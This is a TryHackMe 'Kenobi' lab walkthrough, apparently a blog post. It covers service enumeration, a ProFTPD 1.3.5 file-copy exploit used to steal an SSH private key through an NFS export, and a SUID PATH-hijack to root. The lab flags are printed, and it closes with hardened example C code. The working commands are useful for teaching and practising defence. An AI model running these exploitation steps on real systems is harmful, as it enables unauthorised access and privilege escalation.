TryHackMe Kenobi machine walkthrough

Scan the machine with nmap, how many ports are open?
# nmap -sV 10.10.67.162
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 04:27 EDT
Nmap scan report for 10.10.67.162
Host is up (0.28s latency).
Not shown: 993 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.5
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.17 seconds

So the answer to this question is 7.

Using the nmap command above, how many shares have been found?

Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 04:29 EDT
Nmap scan report for 10.10.67.162
Host is up (0.23s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\10.10.67.162\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (kenobi server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.67.162\anonymous:
|     Type: STYPE_DISKTREE
|     Comment:
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\home\kenobi\share
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.67.162\print$:
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

The scan results show three shares in total.

Once you're connected, list the files on the share. What is the file can you see?

# smbclient //10.10.67.162/anonymous
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep  4 06:49:09 2019
  ..                                  D        0  Wed Sep  4 06:56:07 2019
  log.txt                             N    12237  Wed Sep  4 06:49:09 2019

                9204224 blocks of size 1024. 6877092 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (12.9 KiloBytes/sec) (average 12.9 KiloBytes/sec)
smb: \> exit

The answer is log.txt.

What port is FTP running on?

This one can be answered from the earlier nmap scan: 21.

What mount can we see?

# nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.67.162
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-23 04:33 EDT
Nmap scan report for 10.10.67.162
Host is up (0.23s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /var
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
| rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
| rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
| rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
| rwxrwxrwt   0    0    4096  2019-09-04T08:43:56  crash
| rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
| rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
| rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
| rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
|_
| nfs-showmount:
|_  /var *
| nfs-statfs:
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  1836540.0  6877088.0  22%   16.0T        32000

Nmap done: 1 IP address (1 host up) scanned in 3.77 seconds

The scan results show the NFS export (mount point) is /var, and it is exported to every host (*).

What is Kenobi's user flag (/home/kenobi/user.txt)?

This question asks for the user flag. As the room indicates, it is obtained through the ProFTPD 1.3.5 vulnerability (the server-side file copy via the SITE CPFR / SITE CPTO commands, which works without logging in). The steps are as follows:

# nc 10.10.67.162 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.67.162]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_isa
250 Copy successful

First the private key file is copied into /var/tmp through the ProFTPD vulnerability; then /var, which the NFS server exports to everyone, is mounted on the local Kali Linux box and the file is copied out to Kali Linux.

┌──(root💀kali)-[~/vulnhubs/kenobi]
└─# mkdir /mnt/kenobiNFS

┌──(root💀kali)-[~/vulnhubs/kenobi]
└─# mount 10.10.67.162:/var /mnt/kenobiNFS

┌──(root💀kali)-[~/vulnhubs/kenobi]
└─# ls /mnt/kenobiNFS
backups  cache  crash  lib  local  lock  log  mail  opt  run  snap  spool  tmp  www

Then copy the key (saved as id_isa) from the mounted target filesystem to the local Kali Linux box:

┌──(root💀kali)-[~/vulnhubs/kenobi]
└─# cp /mnt/kenobiNFS/tmp/id_isa .

Set the permissions on id_isa (ssh refuses keys that are readable by others) and log in to the target with that key:

┌──(root💀kali)-[~/vulnhubs/kenobi]
└─# chmod 400 id_isa

┌──(root💀kali)-[~/vulnhubs/kenobi]
└─# ssh -i id_isa kenobi@10.10.67.162
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

103 packages can be updated.
65 updates are security updates.


Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

kenobi@kenobi:~$ pwd
/home/kenobi
kenobi@kenobi:~$ ls
share  user.txt
kenobi@kenobi:~$ cat user.txt
d0b0f3f53b6caa532a83915e19224899

User flag obtained.

Next is privilege escalation. Following the room's steps, search the filesystem for executables with the SUID bit set:

kenobi@kenobi:~$ find / -perm -u=s -type f 2> /dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

What file looks particularly out of the ordinary?

Answer: /usr/bin/menu. Everything else in the list is a standard SUID binary shipped by the distribution; menu is not.

Run the binary, how many options appear?


kenobi@kenobi:~$ menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1

Three options appear.

Use strings to look for readable text inside the menu executable:

kenobi@kenobi:~$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
__isoc99_scanf
puts
__stack_chk_fail
printf
system
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
UH-`
AWAVA
AUATL
[]A\A]A^A_
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
 Invalid choice
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7594
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
menu.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__isoc99_scanf@@GLIBC_2.7
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

The strings show that the first menu option runs curl -I localhost (next to setuid and system in the import list). Note that curl is not given as an absolute path, so the SUID binary resolves it through the caller's PATH, which means we can supply our own curl:

kenobi@kenobi:~$ echo /bin/sh > curl
kenobi@kenobi:~$ chmod 777 curl
kenobi@kenobi:~$ export PATH=/tmp:$PATH

Move the curl file to /tmp (now first on PATH), run menu again and pick choice 1 to get a root shell:

kenobi@kenobi:~$ mv curl /tmp
kenobi@kenobi:~$ menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# ls
share  user.txt
# cd /root
# ls
root.txt
# cat root.txt
177b3cd8562289f37382721c28381f02
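As an added example (not code from the room or from the Kenobi machine), here is how a SUID helper like menu should be written so the PATH hijack above cannot happen: every command is an absolute path, PATH and the loader variables are reset before system() hands the line to /bin/sh, and the choice-to-command lookup is a pure function that can be checked on its own. The command paths are assumed for illustration, not taken from the original binary.

```c
#define _POSIX_C_SOURCE 200809L   /* for setenv()/unsetenv() */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Hardened counterpart of the Kenobi "menu" helper (example code, not the
 * machine's binary). The original, judging by its strings, calls setuid()
 * and then system("curl -I localhost"): "curl" is resolved through the
 * caller's PATH, so an unprivileged user decides what runs as root. */

#define NUM_CHOICES 3
static const char *const COMMANDS[NUM_CHOICES + 1] = {
    NULL,                           /* index 0 unused */
    "/usr/bin/curl -I localhost",   /* 1. status check  (paths assumed) */
    "/bin/uname -r",                /* 2. kernel version */
    "/sbin/ifconfig",               /* 3. ifconfig */
};

/* Map a menu choice to its command; NULL for anything out of range. */
const char *command_for_choice(int choice) {
    if (choice < 1 || choice > NUM_CHOICES)
        return NULL;
    return COMMANDS[choice];
}

/* 1 if the command line names its program by absolute path (no PATH lookup). */
int uses_absolute_path(const char *cmd) {
    return cmd != NULL && cmd[0] == '/';
}

/* Replace the caller-controlled environment before /bin/sh sees it: a fixed
 * PATH, and no IFS or dynamic-loader variables inherited by the root child. */
int sanitize_environment(void) {
    if (setenv("PATH", "/usr/sbin:/usr/bin:/sbin:/bin", 1) != 0)
        return -1;
    unsetenv("IFS");
    unsetenv("LD_PRELOAD");
    unsetenv("LD_LIBRARY_PATH");
    return 0;
}

int main(void) {
    int choice = 0;
    printf("1. status check\n2. kernel version\n3. ifconfig\n** Enter your choice :");
    if (scanf("%d", &choice) != 1 || !command_for_choice(choice)) {
        puts(" Invalid choice");
        return 1;
    }
    return sanitize_environment() == 0 && system(command_for_choice(choice)) == 0 ? 0 : 1;
}
```

The same check generalises to any SUID program found with the find command above: if strings shows a command name without a leading slash, the caller's PATH decides what runs as root.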

Posted 2022-04-23 17:07 by Jason_huawen